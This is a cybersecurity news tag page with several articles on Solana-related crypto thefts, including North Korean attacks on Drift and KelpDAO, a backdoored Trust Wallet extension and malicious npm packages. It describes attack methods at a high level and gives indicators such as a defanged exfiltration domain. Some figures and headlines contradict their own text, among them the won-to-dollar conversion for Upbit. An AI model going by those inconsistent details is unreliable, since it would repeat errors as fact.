CybserSecurity News

Tag: Solana

  • Two Strikes, Half a Billion: How North Korean Hackers Seized 76% of All Stolen Crypto in Just 120 Days

    North Korean cyber-operatives have once again demonstrated how a handful of precision strikes can fundamentally reshape annual cryptocurrency crime statistics. According to data from TRM Labs, between January and April 2026, groups affiliated with the Democratic People’s Republic of Korea (DPRK) accounted for 76% of all losses sustained via crypto-industry breaches, despite these losses originating from only two primary incidents.

    Analysts estimate the aggregate damages from the assaults on Drift Protocol and KelpDAO at approximately $577 million. The exploitation of Drift Protocol on April 1 yielded $285 million for the aggressors, while the breach of the KelpDAO bridge on April 18 accounted for an additional $292 million. Collectively, these two incidents represented only a fraction of the total number of attacks in 2026, yet they secured for North Korea the lion’s share of all purloined capital.

    TRM Labs notes that the DPRK’s proportional involvement in cryptocurrency theft has ascended consistently for several years. In 2020 and 2021, the figure remained below 10%, rising to 22% in 2022, 37% in 2023, 39% in 2024, and reaching 64% in 2025. This surge was further exacerbated by the February 2025 breach of Bybit, where $1.46 billion was exfiltrated from a cold wallet—an event TRM Labs characterizes as the most significant cryptocurrency theft in history.

    The offensive against Drift Protocol was distinguished by its protracted preparation. TRM Labs posits that the adversaries initiated on-chain maneuvers as early as March 11, following several months of social engineering targeting project personnel. The report further indicates that North Korean intermediaries went so far as to engage in face-to-face meetings with Drift representatives.

    Subsequently, the attackers leveraged the Solana durable nonce mechanism, which facilitates the preemptive signing of transactions for later broadcast. On April 1, these pre-staged operations enabled the exfiltration of funds within a mere twelve-minute window. Following an expeditious exchange and bridging of assets to Ethereum, the stolen cryptocurrency has, thus far, remained dormant.

    In the instance of KelpDAO, the assailants targeted the rsETH LayerZero bridge. They compromised two internal RPC nodes and induced malfunctions in external nodes via a distributed denial-of-service (DDoS) attack, thereby precipitating the false validation of a cross-chain message.

    TRM Labs identifies the critical vulnerability as a single-verifier architecture that lacked independent confirmation requirements. Following the incursion, the Arbitrum Security Council froze approximately $75 million; however, the perpetrators successfully converted roughly $175 million in ETH into Bitcoin, primarily utilizing THORChain.

    TRM Labs attributes the KelpDAO breach to the TraderTraitor collective, noting that a portion of the funds utilized to orchestrate the attack is traceable to a Bitcoin wallet belonging to Wu Huihui, a Chinese cryptocurrency broker indicted in 2023 for laundering assets on behalf of Lazarus. The firm estimates that the cumulative volume of cryptocurrency stolen by North Korean entities since 2017 has now surpassed $6 billion.

    TRM Labs issues a stern warning to exchanges and DeFi projects regarding the inherent risks associated with THORChain, cross-chain bridges, and Solana multi-signature wallets. The company advises a rigorous audit of all April inflows, with particular scrutiny directed toward Bitcoin originating from THORChain swaps and any assets linked to the addresses involved in the Drift and KelpDAO thefts.

  • The Long Game: How North Korea’s UNC4736 Spent Six Months Infiltrating Drift for a $285M Payday

    The recent incursion into the cryptocurrency sanctuary Drift, which culminated in the exfiltration of $285 million, has been unmasked not as a serendipitous breach, but as the denouement of a meticulously orchestrated operation spanning nearly half a year. Beneath the veneer of conventional professional discourse lay a labyrinthine scheme of infiltration, wherein trust was forged into the primary instrument of subversion.

    Drift, an architecture predicated upon the Solana blockchain, has attributed the catastrophe to the North Korean syndicate UNC4736, a collective also identified by the monikers AppleJeus and Golden Chollima. According to the enterprise’s telemetry, the foundations of the assault were laid as early as the autumn of 2025. Assailants masquerading as representatives of a prestigious trading firm ingratiated themselves with members of the ecosystem at industry symposia, gradually cultivating professional rapport.

    These communions were strikingly persuasive; the participants demonstrated a profound mastery of market nuances, supported by elaborate backstories and vibrant professional profiles. Following these primordial encounters, a Telegram assembly was inaugurated to deliberate upon integrations and fiscal strategies. In December, the adversaries committed over a million dollars to a proprietary vault—a calculated maneuver that fortified their credibility and secured their foothold within the ecosystem.

    By the dawn of 2026, the interaction had transitioned to the exchange of technical instruments and source code. According to one forensic theory, a developer compiled a project from a provided repository wherein a malignant execution mechanism lay dormant within the Visual Studio Code configurations. Concurrently, another participant ingested a beta iteration of a cryptocurrency wallet via TestFlight. Both trajectories likely facilitated the unauthorized ingress into the core infrastructure.

    Following the strike, the digital vestiges vanished with startling celerity; correspondences and malignant artifacts were summarily excised. Drift observes that the operation mirrored a comprehensive reconnaissance campaign, replete with pre-fabricated personas and sophisticated logistics.

    Analysts from CrowdStrike have previously linked Golden Chollima to a series of offensives against fintech institutions globally. The collective operates with systemic regularity, functioning as a vital conduit for the fiscal programs of the DPRK. Simultaneously, DomainTools has chronicled a metamorphosis in the architecture of North Korean cyber-operations; the monolithic structure has evolved into a distributed ecosystem where discrete groups are tasked with espionage, asset exfiltration, and disruptive strikes. This decentralized paradigm mitigates the peril of systemic exposure should a singular operation falter.

    Social engineering remains the quintessential instrument of their tradecraft. Campaigns such as Contagious Interview and schemes involving fictitious IT specialists facilitate ingress into corporate sanctuaries via the guise of recruitment or technical assessments. These maneuvers leverage an international network of intermediaries and surrogate candidates, with remunerations frequently transacted in cryptocurrency.

    The narrative of Drift illustrates the profound evolution of such methodologies. Eschewing the traditional frontal assault, the adversaries elected to slowly intertwine themselves with the system, weaponizing trust and professional alliances as their primary vectors of attack.

  • Solana Under Siege: Step Finance Drained of $30M as STEP Token Plummets 80% in Hours

    A formidable cyber incursion within the Solana ecosystem has profoundly destabilized the decentralized finance landscape. The Step Finance platform disclosed a breach of its operational wallets, resulting in the illicit exfiltration of approximately $30 million in assets from project reserves; consequently, the associated token plummeted by over 80% within a mere few hours.

    The architects of Step Finance elucidated that the antagonists gained unauthorized access to multiple treasury and commission wallets simultaneously. According to their disclosures, approximately 261,854 SOL were transferred to clandestine addresses. Crucially, user-held wallets remained unblemished, as the offensive specifically targeted the protocol’s internal capital. The team asserted that an exhaustive investigation is underway, having already enlisted the expertise of preeminent cybersecurity firms.

    Market reaction was instantaneous. According to cryptocurrency valuation aggregators, the STEP token collapsed to the $0.004 threshold. The project’s market capitalization evaporated to approximately $1.3 million, relegating it to the status of a micro-cap asset. Liquidity vanished as price volatility intensified; while trading had remained relatively sedate prior to the incident, the subsequent trajectory revealed a vertical descent devoid of discernible support levels. Transient rebounds proved insufficient to arrest the overarching bearish momentum.

    Operational commission activity within the network had previously exhibited sharp escalations in early 2025, reaching $150,000–$160,000 per diem—a phenomenon typically attributed to speculative fervor. Following the compromise, these metrics, alongside trading volumes, have significantly diminished. The current valuation reflects tentative, risk-averse acquisitions and a profound erosion of investor confidence rather than a concerted effort toward recovery.

    Analogous offensives have historically plagued DeFi projects predicated on Solana. Prevailing vulnerabilities often include the compromise of operational wallets, the leakage of private keys, and systemic failures in access control. In prior instances, disparate projects have forfeited millions due to the seizure of administrative accounts or inadequate oversight of privileged operations.

  • How a Hidden Backdoor Drained $7M from Trust Wallet

    A dangerous vulnerability has been discovered in the Trust Wallet browser extension, potentially allowing attackers to steal users’ cryptocurrency. The issue affected version 2.68, and the wallet’s team officially urged everyone who had installed it to immediately disable the extension and update to version 2.69.

    The first complaints were reported by researcher ZachXBT, who wrote that “several Trust Wallet users have reported funds being stolen from their wallets over the past few hours.” Shortly thereafter, Trust Wallet confirmed the risk was specific to browser version 2.68 and issued guidance to move to the patched release.

    A detailed analysis of the incident was published by SlowMist, a firm specializing in blockchain security. Its researchers compared the code in versions 2.67 and 2.68 and identified an insertion resembling a backdoor. According to their findings, the malicious component iterated through wallets stored in the extension and requested each wallet’s seed phrase. It then used either the password entered by the user to unlock the wallet, or an alternative unlock mechanism via passkeyPassword, to decrypt the data and prepare it for exfiltration.

    A crucial clue lay in the attackers’ domain infrastructure. SlowMist reported that seed phrases and other sensitive information were sent to api.metrics-trustwallet[.]com, associated with the domain metrics-trustwallet.com. Researchers found that this domain was registered on December 8, 2025, with the first requests observed starting December 21—dates that align closely with the suspected insertion of the malicious code into the extension.

    Dynamic analysis revealed a particularly subtle technique. After the wallet was unlocked, the seed phrase was placed into the errorMessage field—data that appears to be a benign technical error. This payload was then transmitted to the attackers’ server as part of an otherwise ordinary network request. SlowMist also noted that the attackers leveraged the legitimate PostHog analytics library, but redirected analytics traffic to their own server, disguising the data leak as routine telemetry.

    At the time of publication, SlowMist estimated that total losses could reach into the millions of dollars. Indicative figures include approximately 33 BTC—roughly $3 million—as well as around $3 million on Ethereum networks, including layer-2 solutions. Losses on Solana were significantly smaller, amounting to only a few hundred dollars. After the thefts, the funds were reportedly laundered through several centralized exchanges and cross-chain bridges.

    Researchers emphasized that this incident does not resemble a compromised third-party dependency, such as a malicious npm package, but rather appears to be a direct modification of the extension’s own code. From this, SlowMist concludes that the attack was likely orchestrated by professionals who may have gained prior access to the development environment or the extension’s publishing pipeline.

    Users who installed the Trust Wallet extension are advised to proceed with extreme caution. It is prudent to stop using the extension, securely back up seed phrases or private keys, and transfer funds as quickly as possible to a different wallet you trust. If compromise is suspected, any actions taken on the affected device should be carried out carefully to avoid worsening the situation.

  • Upbit Solana Hack: 100 Billion Tokens Stolen, Exchange Delay Avoids Penalties

    Hackers siphoned more than 100 billion tokens from Upbit in just 54 minutes, exploiting a flaw in Solana asset-handling. During this brief window, roughly 44.5 billion won (~$30.6 million) in digital assets were funneled into unknown external wallets. Yet the exchange notified authorities only six hours after detecting the breach — and regulators now find themselves unable to impose penalties because of a gap in current legislation. According to data the Financial Supervisory Service provided to Assemblyman Kang Min-guk, the attack began at 4:42 a.m. and ended at 5:36, affecting 24 Solana-ecosystem tokens. On average, the attackers were stealing 32 million coins per second.

    The greatest volume fell on the BONK token — more than 103.1 billion coins, accounting for over 99% of all stolen assets, though in monetary terms the largest loss was tied to Solana itself: nearly 1.9 billion won (~$1.3 billion). Significant damage was also incurred by Pudgy Penguin, Official Trump, and other assets. The response timeline shows that by 5:00, Upbit had convened an emergency meeting; within minutes it restricted operations involving Solana-based assets, and by 8:55, all trading was halted. Even so, the first official notice to the financial regulator was not sent until 10:58.

    Despite the delay, penalizing the exchange is nearly impossible: existing rules contain no provisions allowing direct sanctions against virtual-asset operators for security incidents. The FSS is conducting an on-site investigation, but the prospect of meaningful measures remains uncertain. Upbit maintains that no users suffered losses: the company claims it reimbursed the entire stolen amount and notified authorities as soon as the breach was conclusively verified.

  • $41 Million Stolen in SwissBorg Crypto Hack Linked to Third-Party API

    The Swiss crypto platform SwissBorg has confirmed a breach in which attackers siphoned off approximately 193,000 Solana (SOL) tokens from its Earn program. At the time of the incident, the stolen assets were valued at nearly $41 million.

    In an official statement, the company stressed that the attack affected fewer than 1% of users and did not impact other Earn programs or funds within the app. According to SwissBorg, its core infrastructure remains secure, and daily operations continue uninterrupted.

    The breach was traced to a vulnerability in the API of Kiln, a staking infrastructure provider for Solana and Ethereum. Through this compromised API, SwissBorg’s application communicated with the Solana network, enabling the attackers to manipulate requests and withdraw assets.

    The company’s CEO, Cyrus Fazel, speaking in an X Space session, acknowledged the severity of the loss but emphasized that SwissBorg itself remains financially sound: “The incident affected around 1% of our client base and approximately 2% of assets under management. It is a large sum, but it does not put the company at risk.”

    SwissBorg has pledged to cover the losses using its own SOL Treasury and confirmed that it is collaborating with international agencies, cryptocurrency exchanges, and white-hat hackers to recover the stolen funds. The company reported that some transactions had already been frozen.

    In its published recovery plan, SwissBorg outlined two immediate courses of action. First, affected users will be compensated promptly with funds from the SOL Treasury. Second, the company, alongside security experts, will continue efforts to retrieve the stolen assets. Impacted clients will be notified individually via email.

    The Solana Earn program allowed users to earn rewards through staking facilitated by Kiln’s infrastructure. It was part of SwissBorg’s broader Earn product suite, which also includes offerings for BTC and ETH, primarily aimed at retail investors.

    Blockchain data shows that the stolen tokens were transferred to an address now flagged as “SwissBorg Exploiter.” This wallet currently holds more than 190,000 SOL (approximately $40.8 million), and users have been cautioned to exercise extreme vigilance when encountering it.

  • Malicious Go Module Targets Solana Devs, Leaking Data to a “U.S.-Based” Server

    Researchers have uncovered a new politically tinged campaign targeting the Solana blockchain ecosystem and, apparently, developers of cryptocurrency projects in Russia. Specialists at Safety, a company focused on securing software supply chains, identified a cluster of malicious NPM packages disguised as legitimate tools for working with the Solana SDK. In reality, they were delivering an infostealer—malware designed to harvest data from compromised devices.

    The counterfeit packages, published under the names solana-pump-test and solana-spl-sdk, appeared in the official NPM registry and were attributed to an account with the alias cryptohan and the email crypto2001813@gmail[.]com. Analysts believe the pseudonym was selected to lend credibility and is not tied to a real individual. Notably, one of the packages received 14 updates within just ten hours of its release on August 15, signaling active refinement and a likely attempt by the operators to obscure their tracks.

    Once installed, the packages initiated scans of key system directories—home, Documents, Downloads, Desktop, and attached drives on Windows—seeking both general user data and potential crypto assets. Exfiltrated information was transmitted to a command-and-control (C2) server located in the United States. However, investigators also traced IP addresses registered in Moscow within the attackers’ infrastructure, leaving it unclear whether these belonged to infected victims or reflected direct activity by the campaign’s operators.

    The geopolitical dimension adds intrigue: infrastructure based in the U.S., but with victims reportedly concentrated in Russia. On this basis, researchers cautiously suggest the possible involvement of state-aligned actors.

    Additional indicators point to the use of generative AI tools in crafting the malicious code. Console logs contained nonstandard messages featuring emojis—an unusual marker strongly suggestive of text generated by models such as Claude. Such stylistic quirks are atypical in manually written malicious JavaScript, bolstering the hypothesis of automated development techniques.

    Dubbed Solana-Scan, the campaign highlights how the blockchain ecosystem is becoming an increasingly attractive target for cybercriminals. Malicious dependency packages remain a highly effective delivery vector for infostealers. For developers, this underscores the necessity of rigorously vetting external libraries and monitoring their sources, as even widely trusted registries cannot guarantee immunity from tampering.

  • Solana’s Texture Project Recovers $2.2M Crypto After Hacker Accepts “Gray Bounty” Deal

    A high-profile incident has recently concluded within the Solana ecosystem, involving the unauthorized extraction of cryptocurrency assets from the Texture project. Several days ago, an unidentified hacker exploited a vulnerability in one of the Texture Vaults’ smart contracts, siphoning approximately $2.2 million in USDC stablecoins. The attack was confined solely to the USDC vault; all other assets remained untouched.

    Immediately upon detecting the breach, the Texture team suspended all fund withdrawals to contain the situation and prevent any further exploitation. Simultaneously, they activated an internal “war room” to coordinate a rapid response. The developers swiftly identified and isolated the vulnerability and began working on a patch for the affected contract.

    Acknowledging that the attacker still retained control over the stolen funds, the team made an unorthodox decision—they offered the hacker a “gray bounty” amounting to 10% of the stolen assets, on the condition that the remaining 90% be returned without repercussions. This proposition was part of a broader strategy aimed at peaceful resolution, hoping to minimize losses and avoid protracted legal or technical conflict.

    Two hours after the final appeal, the attacker accepted the terms and transferred 90% of the funds back to Texture’s wallet on the Solana network. The team confirmed receipt of the assets and declared that, in light of the agreement being honored, no further action would be pursued against the perpetrator. This resolution sparked widespread discussion within the community. The team extended its gratitude to those who offered support and assisted in the negotiations.

    The developers are now finalizing a comprehensive review of the revised smart contract in collaboration with an external auditor. The updated contract will be redeployed shortly. A detailed technical report is also being prepared, which will elucidate the mechanics of the exploit, outline the vulnerability, and detail the measures implemented to bolster the system’s resilience.